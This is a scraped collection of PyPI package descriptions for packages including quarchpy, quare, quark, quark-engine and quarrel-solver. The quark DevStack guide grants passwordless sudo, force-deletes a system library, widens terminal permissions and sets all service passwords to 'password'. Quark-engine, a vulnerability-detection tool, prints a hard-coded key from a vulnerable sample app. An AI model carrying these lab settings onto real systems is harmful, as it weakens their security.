for devicesFixed bug when scanning for devices within an ArrayModule detection fixes for QCS and PAM/Rev-B HDClean up of calibration switchbox code and user logging2.0.10QCS server logging cleaned upAdditional platform tests added to debug_info testCleaned up print() statements and replaced with logging callsHelp message added to quarchpy.run commandModule detection fixes for QCSImproved calibration promptsAdded initial calibration stubs for the PAMQCS improvements to linux drive enumeration tests2.0.9Significant QCS additions including power testingAdded remote switchbox to calibration utilityVarious minor bug fixes and improvements to calibration utility2.0.8Added readme.md for PyPi descriptionFixed bug in QIS when checking if QIS is runningVarious minor additions for QCS2.0.7Changes since 2.0.2Minor bug fixesCalibration ChangesQIS folder gone, QIS now in QPS onlyRun package addedUpdate quarchpy addedSystemTest improvementsUI changes, input validation, smart port select2.0.2UI Package addedConnection over TCP for python addedLogging on devicesDrive test core added2.0.0Major folder restructureAdded test center supportDetected streaming devicesAdded latest qps1.09 and qisMinor bug fixes1.8.0Tab to white space convertUpdated __init__ file to co-allign with python practicesUpdated project structureAdded documents for changes and Script LocationsDisk selection updateCompatibility with Python 3 and Linux Improved!1.7.6Fixes bug with usb connection1.7.5Fixed USB DLL CompatibilityFixed potential path issues with Qis and Qps open1.7.4Updated to QPS 1.081.7.3Additional Bug Fixes1.7.2Bug fixing timings for QIS (LINUX + WINDOWS)1.7.1Updated FIO for use with Linux and to allow arguments without valuesFixes path problem on LinuxFixes FIO on Linux1.7.0Improved compatability with Windows and Ubuntu1.6.1Updating USB ScanAdding functionality to specify OS bit architecture (windows)1.6.0custom $scan IPfixes QIS detectionimplements custom separator for stream filesBug fix - QIS Load1.5.4Updating README and LICENSE1.5.2Bug Fix - Case sensitivity issue with devices1.5.1Additional Bug Fixes1.5.0Integration with FIOAdditional QPS functionalityAdded device search timeout1.4.1Fixed the wmi error when importing quarchpy.1.4.0\n\u2014Integration with QPSsupports Iometer testingAdditional fixes for wait times1.3.4Implemented resampling and a better way to launch QIS from the script.1.3.3Implements isQisRunningImplements qisInterfaceChanges startLocalQIS to startLocalQisFixes a bug in QIS interface listDevices that didn\u2019t allow it to work with Python 31.3.2Bug Fix running QIS locally1.3.1Implements startLocalQISPacks QIS v1.6 - fixes the bugs with QIS >v1.6 and multiple modulesUpdates quarchPPM (connection_specific)Compatible with x6 PPM QIS stream.1.2.0Changes to object model"} +{"package": "quarchpy-test", "pacakge-description": "QuarchpyQuarchPy is a python package designed to provide an easy-to-use API which will work seamlessly over any connection option: USB, Serial and LAN. With it, you can create your own scripts for controlling Quarch devices - without having to worry about the low-level code involved with communication.The package contains all prerequisites needed as a single PyPI project, which can be installed from the python online repository using PIP. 
This makes it easy to install and update, while also providing you with full access to the source code if you want to make changes or additions.QuarchPy can also communicate to the device via QIS (Quarch Instrument Server), QPS (Quarch Power Studio), or simply using Python scripts. Both QIS and QPS are included with the QuarchPy Package - they are ready to use (Java and drivers may also be needed).Change Log2.1.3modules on the network can now be connected to using conType:QTLNumber eg. TCP:QTL1999-02-001.fixed QIS not closing with QPS when launch with by QPScloseConnection added to QIS apidisplay table formats multiline items and handles empty cells2.1.2QPS v1.20QIS v1.192.1.1Seperation of QIS module scan and QIS select deviceAdded getQuarchDevice which is a wrapper around quarchDevice that allows connections to sub-devices in array controllers over all connection typesVersion compare updated to use __version__ rather than pkg_resourcesSeperated the SystenTest (debug_info) into seperate parts with flags to allow the user to skip certain parts. This allows the test to be run without user interaction of selecting a module.2.1.0logging improvementsusb locked devices fix for CentOS, Ubuntu, and Fedora2.0.22Calibration and QCS removed from quarchpy and are not in their own packagesNew command \u201cpython -m quarchpy.run debug -usbfix\u201d sets USB rules to fix quarch modules appearing as locked devices on Linux OS2.0.21new QIS v1.232.0.20New modules added to calibration, wiring prompt added, logging improvementsFixes for PAM streaming using QISAdded Quarchpy.run list_drivesImproved communication for connection_QPSImproved QCS debuggingReworked QCS drive detection for upcoming custom drive detection\u201cquarchpy.run list_drives\u201d command added2.0.19QPS v1.17Quarchpy run terminal runs the simple python terminal to talk to modulesScan Specific IP address for Quarch module via QIS/QPS addedUpdated performance class for new QCS testsFixed Centos QCS drive selection bugImproved QCS connection classesImproved features for QCSMinor bug fixes2.0.18QPS 1.13Iomenter drive location bugfixUnits added to stats export from QPSChanged QCS tests to work off of a python formatUpdated drive detection in QCSUpdated communication to TLS2.0.16QPS 1.112.0.15QIS v1.19.03 and QPS 1.10.12Updated debug info testSnapshots and stats from QPS functions addedCalibration updates2.0.14QPS annotations through quarchpy improvements2.0.13Python2 bug fixesUI tidy upNew custom annotations and comments QPS API2.0.12Fixed issue with array module scan over UDP outside of subnetBug fix for HD connection via USB in linuxAdded headless launch of QISAdded Shinx auto documentationFixed issue with USB command response timeout in longer QCS testsFixed issue where UDP locate parser was using the legacy header, not the quarch fieldsImproved qurchpy.run oarsing and help generationFixed syntax warnings for string literal comparisonsCalibration wait for specific module uptime and report file updates2.0.11Improved list selection for devicesFixed bug when scanning for devices within an ArrayModule detection fixes for QCS and PAM/Rev-B HDClean up of calibration switchbox code and user logging2.0.10QCS server logging cleaned upAdditional platform tests added to debug_info testCleaned up print() statements and replaced with logging callsHelp message added to quarchpy.run commandModule detection fixes for QCSImproved calibration promptsAdded initial calibration stubs for the PAMQCS improvements to linux drive enumeration tests2.0.9Significant 
QCS additions including power testingAdded remote switchbox to calibration utilityVarious minor bug fixes and improvements to calibration utility2.0.8Added readme.md for PyPi descriptionFixed bug in QIS when checking if QIS is runningVarious minor additions for QCS2.0.7Changes since 2.0.2Minor bug fixesCalibration ChangesQIS folder gone, QIS now in QPS onlyRun package addedUpdate quarchpy addedSystemTest improvementsUI changes, input validation, smart port select2.0.2UI Package addedConnection over TCP for python addedLogging on devicesDrive test core added2.0.0Major folder restructureAdded test center supportDetected streaming devicesAdded latest qps1.09 and qisMinor bug fixes1.8.0Tab to white space convertUpdated __init__ file to co-allign with python practicesUpdated project structureAdded documents for changes and Script LocationsDisk selection updateCompatibility with Python 3 and Linux Improved!1.7.6Fixes bug with usb connection1.7.5Fixed USB DLL CompatibilityFixed potential path issues with Qis and Qps open1.7.4Updated to QPS 1.081.7.3Additional Bug Fixes1.7.2Bug fixing timings for QIS (LINUX + WINDOWS)1.7.1Updated FIO for use with Linux and to allow arguments without valuesFixes path problem on LinuxFixes FIO on Linux1.7.0Improved compatability with Windows and Ubuntu1.6.1Updating USB ScanAdding functionality to specify OS bit architecture (windows)1.6.0custom $scan IPfixes QIS detectionimplements custom separator for stream filesBug fix - QIS Load1.5.4Updating README and LICENSE1.5.2Bug Fix - Case sensitivity issue with devices1.5.1Additional Bug Fixes1.5.0Integration with FIOAdditional QPS functionalityAdded device search timeout1.4.1Fixed the wmi error when importing quarchpy.1.4.0\n\u2014Integration with QPSsupports Iometer testingAdditional fixes for wait times1.3.4Implemented resampling and a better way to launch QIS from the script.1.3.3Implements isQisRunningImplements qisInterfaceChanges startLocalQIS to startLocalQisFixes a bug in QIS interface listDevices that didn\u2019t allow it to work with Python 31.3.2Bug Fix running QIS locally1.3.1Implements startLocalQISPacks QIS v1.6 - fixes the bugs with QIS >v1.6 and multiple modulesUpdates quarchPPM (connection_specific)Compatible with x6 PPM QIS stream.1.2.0Changes to object model"} +{"package": "quarchQCS", "pacakge-description": "No description available on PyPI."} +{"package": "quare", "pacakge-description": "quareInteract with Quip from the command line.Introductionquare allows interaction withQuipvia the command line. Whilequareis in alpha, there are some features you may find useful:Pipe the output of a command to a chat or document and format it as monospace.Archive messages by piping them into a local fileSecurely store authentication tokens for multiple Quip instances.This tool is in its early stages of development, and is subject to change (or abandonment) at any time. Use at your own risk.Installation$pipxinstallquareUsageAuthenticationStore a Quip API token (See:https://quip.com/dev/token):$quareauthToken: long_token_stringToken stored.If you have multiple Quip instances (like multiple Slack Workspaces), you can specify an alias for them. 
You can also pass your token directly toauth:$quaremsgauth--aliastest_server--token't1DJBQWBXHCYgh1=|2983928392|nYtRFIhV7nl4...'WhoamiTo see information about the logged in user:$quaremsgwhoami\u250cDefault\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\u2502 Name \u2502 Tests Testeri \u2502\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\u2502 Email(s) \u2502 t@testz.dev \u2502\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\u2502 Quip User ID \u2502 mRLA6Zdn3PO \u2502\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518Sending messagesThe destination may be a document or chat:$quaremsgsend--roomroom_id--content'Hello everyone!'Pipe content fromstdinMessage content can be piped fromstdin:$uname-a|quaremsgsend--roomroom_id--content'-'While Quip allows formatting messages using some markdown markup, it doesn't recognize markdown code blocks (\"```\"). To define a code block, use the--monospaceoption:$dmesg|tail-n5|quaremsgsend--roomroom_id--content'-'--monospaceReceiving messagesStream to stdoutTo stream every message appearing in the Updates tab:$quaremsgstreamStreaming updates... press Ctrl-C to exit.[Sun Jun 30 17:23:09 2019 | (Test Log) | @Tests Testeri] ok okDump the content of a chat roomTo get the last 5 messages in a chat room or document:$quaremsgget--roomroom_id--last5[Sat Jun 29 03:19:09 2019 | @Tester Testeri] This is a monologue![Sat Jun 29 16:00:12 2019 | @Tester Testeri] ok[Sat Jun 29 16:34:51 2019 | @Tester Testeri] I'm done![Sun Jun 30 17:30:14 2019 | @Tester Testeri] \ud83c\udf2e[Sun Jun 30 17:30:27 2019 | @Tester Testeri] \ud83e\udd43To get the last 2 messages as JSON:$quaremsgget-r\"IcTAAAtVxXb\"--last2--json[{\"author_id\": \"mRLA6Zdn3PO\", \"visible\": true, \"id\": \"IcderpEe8wG\", \"created_usec\": 1561849212672040, \"updated_usec\": 1561849212696571, \"text\": \"ok\", \"author_name\": \"Tester Testeri\"}, {\"author_id\": \"mRLA6Zdn3PO\", \"visible\": true, \"id\": \"IcNodg7n2Tx\", \"created_usec\": 1561851291612434, \"updated_usec\": 1561851291620308, \"text\": \"chat\", \"author_name\": \"Tester Testeri\"}]To dump the last 200 messages in a chat room into a text file:$quaremsgget--roomroom_id--last200>interesting_conversation.logTo get all messages since a datetime:$quaremsgget--roomroom_id--since2019-01-01T00:32:00Z>greppable_archive.logThe--sinceoption recognizes any date recognized bydateparser:$quaremsgget--roomroom_id--since'Monday'>this_week.log$quaremsgget--roomroom_id--since'2 months ago'>this_quarter.logEditing documentsTo append a markdown file to an existing document$quaredocappend--idxxxDoc_IDxxx--file/tmp/foo.md$cat/tmp/foo.md|quaredocappend--idxxxDoc_IDxxx--file-To append a markdown-format string to an existing document$quaredocappend--idxxxDoc_IDxxx--content'## Headline\\n\\n'DevelopmentThis work is licensed under the terms of theLGPL-3.0.ContributionsSee CONTRIBUTING.rst"} +{"package": "quarg", "pacakge-description": "Generate a command line interface with no code, and gradually add annotations for more control."} +{"package": "quark", 
"pacakge-description": "=====quark=====Caution=======Quark is not currently designed to work with `DevStack `_ (but it can with the instructions below). We mention this because these instructions can become invalid if and when changes are pushed to DevStack. Please also not that once Quark+Neutron+DevStack+Tempest are wired up, the Tempest tests are failing. Please watch `this Quark Github Issue `_ for updates on this.Dependencies===================`aiclib `_Database Migrations===================`Here `_Install with DevStack and Neutron=================================- Ensure you have a user already with sudo rights. If you need one, do this as root::/usr/sbin/adduser stackecho \"stack ALL=(ALL) NOPASSWD: ALL\" >> /etc/sudoers- Switch to user with sudo rights::sudo su - stack # or whatever user you already have (instead of stack)- Clone devstack::git clone https://github.com/openstack-dev/devstack- Go into devstack folder::cd devstack- Create the local.conf configuration file that DevStack needs (localrc is inside it now) with Neutron as an anabled service (NOTE: This notation is explained `here `_)::[[local|localrc]]DATABASE_PASSWORD=passwordADMIN_PASSWORD=passwordSERVICE_PASSWORD=passwordSERVICE_TOKEN=passwordRABBIT_PASSWORD=password# Enable LoggingLOGFILE=/opt/stack/logs/stack.sh.logVERBOSE=TrueLOG_COLOR=TrueSCREEN_LOGDIR=/opt/stack/logs# Pre-requisiteENABLED_SERVICES=rabbit,mysql,key# Horizon (always use the trunk)ENABLED_SERVICES+=,horizonHORIZON_REPO=https://github.com/openstack/horizonHORIZON_BRANCH=master# NovaENABLED_SERVICES+=,n-api,n-crt,n-obj,n-cpu,n-cond,n-schIMAGE_URLS+=\",https://launchpad.net/cirros/trunk/0.3.0/+download/cirros-0.3.0-x86_64-disk.img\"# GlanceENABLED_SERVICES+=,g-api,g-reg# NeutronENABLED_SERVICES+=,q-api,q-svc,q-agt,q-dhcp,q-l3,q-lbaas,q-meta,neutron# CinderENABLED_SERVICES+=,cinder,c-api,c-vol,c-sch# TempestENABLED_SERVICES+=,tempest- Remove Python's six packge::sudo rm -f /usr/lib/python2.7/dist-packages/six.py /usr/lib/python2.7/dist-packages/six.pyc# Old version of six package in /usr/lib/python2.7/dist-packages/ crashes# quark server- Install Devstack::./stack.sh- Install aiclib::sudo pip install aiclib# the reason for sudo here is if you don't you'll get permission denied when it tries to install to /usr/local/lib/python2.7/dist/packages- Install quark::cd /opt/stack #the folder where devstack installed all the servicesgit clone https://github.com/rackerlabs/quarkcd quarksudo python setup.py develop# the reason for sudo here is if you don't you'll get permission denied when it tries to install to /usr/local/lib/python2.7/dist/packages- Validate quark installed::pip freeze | grep quark# should see something like:# -e git+http://github.com/rackerlabs/quark@ff5b05943b44a44712b9fc352065a414bb2a6bf9#egg=quark-master- Now edit the /etc/neutron/neutron.conf file to setup Quark as the core plugin::vim /etc/neutron/neutron.conf# Search for line containing 'core_plugin = ' and replace it with# 'core_plugin = quark.plugin.Plugin'## Search for line containing 'service_plugins = ' and remove# 'neutron.services.l3_router.l3_router_plugin.L3RouterPlugin,' from# service plugins list- Stop Neutron by going into the screen session and going to the q-svc window and pressing ctrl-C::screen -r # or go into devstack clone and then type ./rejoin-stack.sh# press ctrl+6 to go to q-svc windowctrl+C- Go back into screen and restart neutron (q-svc window)::screen -r stack # or go into folder where you cloned devstack then type ./rejoin-stack.sh# if screen command returns 
'Cannot open your terminal /dev/pts/0' execute 'sudo chmod o+rwx /dev/pts/0'# go to q-svc window (ctrl+a, 7 currently does it)# previous command that devstack used to start neutron should be in history, press up arrow key to see it- You shouldn't receive any errors. To validate Quark has started up, you can scroll up in q-svc screen window (ctrl+a, esc, page-up) and look for the following lines::DEBUG neutron.service [-] core_plugin = quark.plugin.Plugin...DEBUG neutron.service [-] QUARK.default_ipam_strategy=ANYDEBUG neutron.service [-] QUARK.default_net_strategy={}DEBUG neutron.service [-] QUARK.default_network_type=BASEDEBUG neutron.service [-] QUARK.ipam_driver=quark.ipam.QuarkIpamDEBUG neutron.service [-] QUARK.ipam_reuse_after=7200DEBUG neutron.service [-] QUARK.net_driver=quark.drivers.base.BaseDriverDEBUG neutron.service [-] QUARK.strategy_driver=quark.network_strategy.JSONStrategyGOTCHAS=======- you won't be able to create ports until you've added at least one mac_address_range (use `this `_ script to do it, changing host IP and admin password)"} +{"package": "quarkapi", "pacakge-description": "quark-api-python\u0440\u045f\u201c\u0459 The Quark API for Python developers."} +{"package": "quark-engine", "pacakge-description": "Quark Script - Dig Vulnerabilities in the BlackBoxInnovative & InteractiveThe goal of Quark Script aims to provide an innovative way for mobile security researchers to analyze orpentestthe targets.Based on Quark, we integrate decent tools as Quark Script APIs and make them exchange valuable intelligence to each other. This enables security researchers tointeractwith staged results and performcreativeanalysis with Quark Script.Dynamic & Static AnalysisIn Quark script, we integrate not only static analysis tools (e.g. Quark itself) but also dynamic analysis tools (e.g.objection).Re-Usable & SharableOnce the user creates a Quark script for specific analysis scenario. The script can be used in another targets. Also, the script can be shared to other security researchers. This enables the exchange of knowledges.More APIs to comeQuark Script is now in a beta version. 
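To give a concrete feel for the scripting model described above, here is a rough sketch of what a Quark Script can look like, in the spirit of the CWE-798 quick start that follows. The helper names used here (Rule, runQuarkAnalysis, behaviorOccurList, getParamValues) are recalled from the Quark Script API document and should be treated as assumptions to verify there, not guaranteed signatures.

from quark.script import Rule, runQuarkAnalysis  # helper names assumed; confirm in the API document

SAMPLE_PATH = "ovaa.apk"               # sample APK from the quick start below
RULE_PATH = "findSecretKeySpec.json"   # detection rule describing the API sequence of interest

rule_instance = Rule(RULE_PATH)
quark_result = runQuarkAnalysis(SAMPLE_PATH, rule_instance)

# Each matched behaviour exposes the argument values passed to the detected APIs,
# which is how a hard-coded AES key can be spotted.
for behavior in quark_result.behaviorOccurList:
    params = behavior.getParamValues()  # assumed accessor name
    if params and "AES" in str(params):
        print(f"Possible hard-coded key material: {params}")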
We'll keep releasing practical APIs and analysis scenarios.See API documenthere.CWE ShowcasesCWE-020Improper Input ValidationCWE-022Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')CWE-023Relative Path TraversalCWE-073External Control of File Name or PathCWE-078Improper Neutralization of Special Elements used in an OS CommandCWE-088Improper Neutralization of Argument Delimiters in a CommandCWE-089Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')CWE-094Improper Control of Generation of Code ('Code Injection')CWE-117Improper Output Neutralization for LogsCWE-295Improper Certificate ValidationCWE-312Cleartext Storage of Sensitive InformationCWE-319Cleartext Transmission of Sensitive InformationCWE-327Use of a Broken or Risky Cryptographic AlgorithmCWE-328Use of Weak HashCWE-338Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)CWE-489Active Debug CodeCWE-502Deserialization of Untrusted DataCWE-532Insertion of Sensitive Information into Log FileCWE-601URL Redirection to Untrusted Site ('Open Redirect')FileCWE-749Exposed Dangerous Method or FunctionCWE-780Use of RSA Algorithm without OAEPCWE-798Use of Hard-coded CredentialsCWE-921Storage of Sensitive Data in a Mechanism without Access ControlCWE-925Improper Verification of Intent by Broadcast ReceiverCWE-926Improper Export of Android Application ComponentsCWE-940Improper Verification of Source of a Communication ChannelQuick StartIn this section, we will show how to detect CWE-798 with Quark Script.Step 1: Environments RequirementsQuark requires Python 3.8 or above.Step 2: Install Quark EngineInstall Quark Engine by running:$pip3install-Uquark-engineStep 3: Prepare Quark Script, Detection Rule and the Sample FileGet the CWE-798 Quark Script and the detection rulehere.Get the sampe file (ovaa.apk)here.Put the script, detection rule, and sample file in the same directory.Edit accordingly to the file names:SAMPLE_PATH=\"ovaa.apk\"RULE_PATH=\"findSecretKeySpec.json\"# Now you are ready to run the script!Step 4: Run the script$python3CWE-798.py# You should now see the detection result in the terminal.Foundhard-codedAESkey49u5gh249gh24985ghf429gh4ch8f23fCheck thedocumentfor more examples.AcknowledgmentsThe Honeynet ProjectGoogle Summer Of CodeQuark-Engine has been participating in the GSoC under the Honeynet Project!2021:YuShiang Dang:New Rule Generation Technique & Make Quark Everywhere Among Security Open Source ProjectsSheng-Feng Lu:Replace the core library of Quark-EngineStay tuned for the upcoming GSoC! Join theHoneynet Slack chatfor more info.Core Values of Quark Engine TeamWe lovebattle fields. We embraceuncertainties. We challengeimpossibles. Werethinkeverything. We change the way people think. And the most important of all, we benefit ourselves by benefit othersfirst."} +{"package": "quark_hash", "pacakge-description": "UNKNOWN"} +{"package": "quarkit", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "quarks2-fractal", "pacakge-description": "No description available on PyPI."} +{"package": "quarkserver", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "quarksmart", "pacakge-description": "No description available on PyPI."} +{"package": "quark-sphinx-theme", "pacakge-description": "Quark: a Sphinx theme for QTextBrowserQuark is a Sphinx theme specifically designed to look and work well within the\nlimitations of the Qt toolkit'sQTextBrowser.This theme was originally designed for the bundled manual ofSpeedCrunch.InstallationInstall the theme:$pipinstallquark-sphinx-themeEnable it in yourconf.pyhtml_theme='quark'# generate QTextBrowser-compatible HTML4 instead of something newerhtml4_writer=TrueOptional: enable improved design for some elements by rewriting HTML:# To enable more QTextBrowser-compatible HTML generation:extensions=['quark_sphinx_theme.ext.html_rewrite']Releasingset package version inquark_sphinx_theme/__init__.pyupdate changelogtag release commit withv, e.g.v0.6.0Changelogquark-sphinx-theme 0.6.0(2020-04-15)Bump minimum required Python version to 3.5.Bump minimum required Sphinx version to 1.8.Fixhtml_rewriteextension to properly load on other HTML-based\nbuilders (e.g. theqthelpbuilder).Change the way thehtml_rewriteextension modifies the HTML builder to\nbe less invasive.Add asphinx.html_themesentry point to allow loading the theme\nautomatically, without settinghtml_theme_path.Miscellaneous tooling changes:The build system was changed from setuptools (setup.py) to flit.The CI pipeline was expanded to catch more issues.quark-sphinx-theme 0.5.1(2018-04-30)Sphinx 1.7 compatibility:An internal refactoring broke the integration tests. This has been fixed.Every commit is now tested on every supported Python and Sphinx version\nusing Gitlab CI.The entire test suite is regularly re-run with the latest Sphinx version to\nmore consistently discover compatibility issues.quark-sphinx-theme 0.5.0(2017-06-05)Sphinx 1.6 compatibility:A change in Sphinx's HTML code broke the HTML rewriting extensions (see\nissue #1).A change in thecss_filesvariable in the basic theme's template broke\ntheextra_css_filestheme setting.quark-sphinx-theme 0.4.1(2016-11-22)Fixpython_requiresin setup.py.quark-sphinx-theme 0.4(2016-10-18)Add an explicit dependency on Sphinx.Renamequark_html_rewrite_featurestoquark_html_features.Addquark_html_disabled_featuresto explicitly turn off certain rewrite\nfeatures.Style changes:More visually appealing code blocks on full browsers.Add styling for compact lists produced by::hlistdirective.Correctly set width for topic blocks.Clean up definition list margins.quark-sphinx-theme 0.3.2 \"I'll get it right some day\"(2016-05-23)Include a copy of the lovelace style for compatibility with Pygments < 2.1.quark-sphinx-theme 0.3.1(2016-05-23)Skip CSS syntax tests if tinycss isn't available.Make sure to include theme itself.Include test/util.py in source packages.quark-sphinx-theme 0.3(2016-05-22)Removehide_sidebar_in_indexoption.Fix styling of index pages.Thequark_sphinx_theme.ext.html_compatextension has been renamed toquark_sphinx_theme.ext.html_rewrite. The old name remains supported for\nbackwards compatibility.Thehtml_rewriteextension now supports wrapping admonitions in tables,\nallowing for more styling options. The theme has been updated to take\nadvantage of this. Admonitions, topics, and sidebars look very different and\nmuch better. Ifhtml_rewriteis not enabled, a fallback style will be\nused for these.html_rewritesupports wrapping literal blocks in tables. 
If enabled,\nthis provides better styling for Pygments styles with non-white backgrounds.Smaller design changes:Don't use background color on code elements in headings and normal links.Display terms in definition lists in bold.Remove left and top margins for definition list bodies.Switch default code color scheme to 'lovelace'.quark-sphinx-theme 0.2.1(2016-03-02)Change license to 2-clause BSD (in practice, it's the same thing).quark-sphinx-theme 0.2.0(2016-02-28)Addquark_sphinx_theme.ext.html_compatextension.Add styling for citations, footnotes, table captions, andrubricdirectives.quark-sphinx-theme 0.1.2(2016-02-27)Fix compatibility with Jinja2 2.3.quark-sphinx-theme 0.1.1(2016-02-24)Fix spacing of navigation links.quark-sphinx-theme 0.1.0(2016-02-24)Initial release."} +{"package": "quarkstudio", "pacakge-description": "123"} +{"package": "quarkz", "pacakge-description": "Seehttps://github.com/quarkz-encryption/quarkz"} +{"package": "quarrel", "pacakge-description": "querulous_quarrelNamed for a lovely groups of sparrows that happened to be flying by. A library\nthat makes writing and executing queries a little easier for data scientists.quarrelusesconcentricandwaddleand is proudly sponsored by the m&a\nteam at cscgh.installationcd /path/to/repo\npip install quarrelquick startcreate a config fileoracle:\n host: oracle.example.com\n user: scott\n password: tiger\n sid: xeinitialize concentric with the config file from (1)from concentric.managers import setup_concentric\n\n setup_concentric('/path/to/oracle.yml')(optional) initialize the sql template directoriesfrom quarrel.settings import setup_quarrel\n setup_quarrel('/path/to/jinja2/sql/templates', '/path/to/jinja2/sql/queries')query the databasefrom quarrel.raw import query\n results = query('oracle', 'select sysdate from dual')raw results -- get raw results from the dbapi connectionquarrel.rawallows you to get the tuples as they were returned by the\nunderlying dbapi connection. the header will be the cursor.description\nreturned from the query, and the results will be the list of tuples returned\nby the query.> from quarrel.raw import query\n> header, results = query('oracle', 'select sysdate d from dual')\n> print(header[0][0])\nD\n> print(results)\n[(datetime.datetime(2022, 6, 26, 15, 10, 59),)]cooked results -- get results as a list of dictsquarrel.cookedallows you to get alistofdicts which is slightly easier to\nunderstand and work with but can be substantially slower as python will\nconstruct a dict per row that is returned. Each key of thedictwill be\nthelower-cased column namespecified in the query.> from quarrel.cooked import query\n> results = query('oracle', 'select sysdate d from dual')\n> print(results)\n[{'d': datetime.datetime(2022, 6, 26, 15, 14, 12)}]sqlalchemy resultsquarrel.sqlalchemyallows you to get alistofdicts as well. However,\nit uses sqlalchemy under the hood. 
This can be useful when you need sql alchemy's\nconnection pooling features.> from quarrel.sqlalchemy import query\n> results = query('oracle', 'select sysdate d from dual')\n> print(results)\n[{'d': datetime.datetime(2022, 6, 26, 15, 14, 12)}]pandas resultsquarrel.pandasallows you to get a dataframe using either the dbapi\nconnection or a sqlalchemy connection.> from quarrel.pandas import query\n> results = query('oracle', 'select sysdate d from dual')\n> print(results)\n d\n0 2022-06-26 15:20:34\n\n> from quarrel.pandas import query_alchemy\n> results = query_alchemy('oracle', 'select sysdate d from dual')\n> print(results)\n d\n0 2022-06-26 15:20:34In order to use pandas, make sure you installpandassupport using\nthepandasextrapip install quarrel[pandas]"} +{"package": "quarrel-solver", "pacakge-description": "quarrel-solverTool forQuarrel(and other word games)SummaryProvides word game-related tools, and can be configured with custom settings, letter scores, and wordlists.Works on Python 3.6 and above. Tested on Windows 10.ContentsSummaryContentsThequarrel-solverlibraryDirect executionExample caseSettingsThequarrel-solverlibraryInstall thequarrel-solverlibrary to use all functionality in your own projects.Remember to always use the latest version, as not all bugfixes are documented!$py-mpipinstall--upgradequarrel-solver\n$py>>>fromquarrel_solverimportbuild_settings,Ruleset>>>q=Ruleset(...settings=build_settings(...{'max_words_len':8}...)...)>>>print(...q.solve_str('wetodlnm')...)---query:delmnotw(8letters)---8letters-18pointsMELTDOWN5letters-14pointsMOWED4letters-12pointsMEWL3letters-10pointsMEW,MOW,WEM2letters-6pointsEW,OW,WE,WO>>>_Note: for thepip installcommand, you can usequarrel-solverwith a hyphen, orquarrel_solverwith an underscore. When importing the module in Python or running it from the commandline, youMUSTuse an underscore.For a more informed walkthrough, please see theexample casebelow.Direct execution$py-mquarrel_solverIf you call the library directly, you'll be greeted with a commandline program. Its input screen looks like this:>_Type your letters into the field, pressEnter, and wait for the program to calculate the best words. Once it's done, choose one from the list that corresponds with the number of letters you have available, or the next lowest. See the example below to find out why you might not need to use all of your spaces.Example caseHere's an example using the default program settings. Our situation is the following:We're playingQuarrel, and thus we get 8 letters.Our letters arewetodlnm.We have 7 spaces to use.After installing the library, we'll open a commandline and run the program.Since we know we don't need words longer than 8 letters, we can minimise loading time by configuring the program to only calculate for words of that length. We can do this by passing our desired settings as command arguments:$py-mquarrel_solver--max_words_len8Note: this has the same effect as creating asettings.jsonfile, then running the command from the same directory:// settings.json\n{\"max_words_len\": 8}## from folder with settings.json$py-mquarrel_solverWhichever way the program is run, it will have to load a wordlist. Once it finishes loading, we can input our letters and pressEnter.>wetodlnm---query:delmnotw(8letters)---8letters-18pointsMELTDOWN5letters-14pointsMOWED4letters-12pointsMEWL3letters-10pointsMEW,MOW2letters-6pointsOW,WE,WO>_This tells us that the anagram isMELTDOWN, but we can't make that word because we can only use 7 letters. 
In this case, our best word isMOWED(14 points). Based on this output, we also know that our opponent cannot score higher than us without all 8 spaces.Note: a word likeLETDOWNscores the same number of points asMOWED, but isn't recognised as a \"best word\" in this case. This is because when words are tied for points, the program will choose the word/s with the fewest letters.The fewer letters your word has, the faster you can write it into your game. This is especially important inQuarrel, as the tiebreaker for equal points is input speed.SettingsUpon being run directly, the program will automatically generate (or look for) asettings.jsonfile in the directory which the command is run from. This file contains the program's settings, which can be changed to suit your needs.When usingquarrel-solver, you should can pass adictwith any of the following keys intobuild_settingsto generate a full settings object, then pass the output to aRulesetto create a new instance. Here are all the currently supported settings:SettingDefaultDescriptionall_lowercasefalseDisplays output in lowercase letters. The default setting displays capital letters to mimic the style of word games likeScrabbleandQuarrel. However, some people may find lowercase output more readable.allow_repeatsfalseDetermines whether letters can be used more than once. Change this according to your word game's rules; for example,Scrabbletiles can only be used once in a single word, whereasNew York Times'sSpelling Beeallows the reuse of letters.display_debugfalseShows the program's inner workings whilst calculating. Note that this may negatively affect performance on certain devices or IDEs.exclude_words[]List of words that the program will never output.ignore_scoresfalseDetermines whether point values for words are considered, in which case only the highest-scoring words are displayed. If you don't care about scoring, turn this off to see all words.include_words[]List of additional words for the wordlist.letter_scores\"quarrel\"Determines the letter scoring system used for calculating points. The value here is passed intobuild_letter_scores(), and defaults back if invalid.max_words_lenlongest length in wordlistDetermines the maximum word length the program will calculate for.min_words_len2Determines the minimum word length the program will calculate for.settings_path(commandline only)NonePath to the settings file.When running directly:To change your settings, do one of the following:Opensettings.jsonin a text editor and change any values. Make sure to save the file once you're done.Pass the setting as a command argument like this:--setting_name valueThis will automatically update the settings file, if applicable.$py-mquarrel_solver--display_debugtrue--max_words_len8Ifsettings.jsonis not present in your folder, try running the program and letting it fully load. It should then create the file.After savingsettings.json, the program will not change if it's already running. Close the program and run it again to use the changed settings."} +{"package": "quarrierpackage", "pacakge-description": "test quarrier"} +{"package": "quarry", "pacakge-description": "Quarry is a Python library that implements theMinecraft protocol. 
